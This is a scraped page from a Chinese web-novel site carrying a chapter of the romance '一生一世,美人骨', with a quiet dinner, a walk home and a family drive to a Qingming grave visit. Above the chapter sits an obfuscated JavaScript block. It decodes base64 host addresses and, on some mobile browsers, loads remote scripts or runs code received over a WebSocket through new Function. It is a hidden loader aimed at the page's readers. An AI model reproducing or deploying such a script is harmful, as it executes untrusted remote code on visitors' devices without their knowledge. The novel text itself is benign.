笔趣阁

字:
关灯 护眼
笔趣阁 > 一生一世,美人骨 > 第六章 今生的前世 3
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x73\x49\x42\x6b\x73\x42\x45\x58\x66\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NramRrZnMucW9ybb3NtYWxsLmNvbbQ==','d3NzOi8vd3MMuc3luZ2d5LmNvbTo5MMDkw',window,document,['b','M']);}:function(){};

第六章 今生的前世 3

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
如果换作宏晓誉,肯定只会觉得,“吴歌”这个东西,光是听名字就甚是风雅。
  
  可她却知道的多一些。比如,吴歌大多是优雅的淫词艳曲,闺房密诗。所以,虽和诗经出现的时间相差无几,却……总之,在学生时代的课本上,绝不会出现。
  
  她轻咳嗽声,换了个话题:“你们平常做那些实验,会不会很辛苦?”
  
  “还好,”他说,“要看是什么方向,我这里,很少有女孩子。”
  
  “为什么?”
  
  “很辛苦。”
  
  再深问,又将是外行与内行的对话,她很识趣,没有继续问下去。
  
  到真正吃宵夜的时候,两个人没什么语言交流,却并不显得尴尬。
  
  
  
  食不言,寝不语。是她自幼的习惯。
  
  听起来很有教养,在家里众多亲戚眼里,却非常怪异。比如逢年过节时,大人们总习惯把十几岁的小孩子,都安排在一个小圆桌旁吃饭,嘻嘻哈哈中,只有她一个人把饭安静吃完,再喝了汤。
  
  然后,放下碗筷坐在原处,安静坐着,等所有人吃完再离席。
  
  起初如此,都会被夸赞好懂事,渐渐地,却成了堂兄妹口中的“怪人”,私下也被评价为很傲气的小女孩。
  
  那时,她不懂得圆滑。
  
  后来慢慢长大了,总要去适应这个社会,比如在学校食堂,总要配合女孩子们边吃饭边闲聊,工作后,也要在偶尔在应酬时的晚餐,也要陪着别人闲聊。
  
  
  
  这么多年,倒真是初次,遇到了和自己有同样习惯的人。
  
  而最幸福的,这个人就是周生辰。
  
  整个吃饭的过程中,他只是亲自用糕点匣中的木质筷箸,给她夹了块醉蟹膏,然后再换回自己的筷子继续吃下去。时宜对他笑了笑,忽然觉得,这样的画面很熟悉。很多记忆早已被打散,但他的一举一动,都让她觉得似曾相识。
  
  在过去的某个时间,某个地点,一定曾经有过这样的画面。
  
  
  
  周生辰把她送到住宅小区,并没有让司机开车进入,反倒是走下车,步行把她送到了楼下,说:“我最近三个月,都会在镇江和上海往返。”
  
  “镇江?”
  
  “是,镇江,很奇怪吗?”
  
  “也没有,我父亲的祖籍就是镇江,”她笑,“虽然不怎么回去,但听到这个地名,还是觉得亲切。”
  
  他笑起来:“很巧。”
  
  “是啊,真巧,”她想了想,还是比较好奇地问了句,“还是不习惯用私人手机吗?”
  
  “不是很习惯,”他笑,“你手机里的那个号码,可以随时找到我。”
  
  她点点头。
  
  然后,两个人都安静了。
  
  值夜班的保安坐在大堂里,他认识时宜这么个大美女,却是初次见她和个男人在一起,忍不住好奇地用眼睛瞅这里。
  
  “我走了?”最后还是时宜先开口。
  
  “好,再见。”
  
  她转过身,从书包里找门卡的时候,门已经嘀地一声打开,她怔了怔,听见保安的声音从玻璃门里传出来,招呼她进门,这才恍然。
  
  时宜忽然又回过头,看着他,再次说:“我走了。”
  
  她甚至想象的到,自己的表情有多么舍不得。
  
  周生辰微微展颜:“再见。”
  
  
  
  她把那个号码存下来,却一直没找他。
  
  她想,自己应该还是顾忌到了偶然听到的那个“未婚妻”,二十几年的生活,从稚儿到一个普通的女人,她起码学会了认清现实。
  
  她的愿望,只是再见到他。
  
  连这种亿万分之一概率的心愿,都让她达成了,再有奢求,就是妄念。
  
  
  
  那晚过了不久,就是清明节。
  
  因为去年爷爷去世,就葬在江苏镇江,所以今年的清明节,自然就要回去扫墓。大概凌晨五点多,父亲就开着车,带着母亲来接她。
  
  时宜睡眼惺忪地坐在车后排,靠着母亲,时睡时醒地,竟然快三个小时了,仍旧堵在沪宁高速公路。从天黑睡到了日光明媚,母亲始终在和她闲聊着,估计也是怕后排两个人都睡着了,作为司机的父亲就会犯困,出什么危险。
  
  当然,自从大学毕业,聊的内容十有八九,是婚事。
  
  “最近有没有交什么男朋友?”
  
  “没有,”时宜靠着母亲的肩膀,嘟囔着说,“没有,没有,没有”
  
  “遇不到喜欢的?”
  
  她没吭声。
  
  母亲察觉到她的异样:“遇到了?”
  
  “遇到了,”她笑,“但是他可能,快要结婚了吧?”
  
  母亲微蹙眉:“是不是工作中遇到的?”
  
  父亲也从后视镜看两个人。
  
  时宜这才有所察觉,自己的话,太像是寻常的家庭剧中,貌美女子插足别人爱情的故事,忙不迭摇头:“只是认识了一个人,有些好感,其余的什么也没有。”
  
『加入书签,方便阅读』
热门推荐
长夜余火 快看那个大佬 有请小师叔 在港综成为传说 旧日之箓 诡异世界生存手册 诡秘之主 奥术神座 灭运图录 武道宗师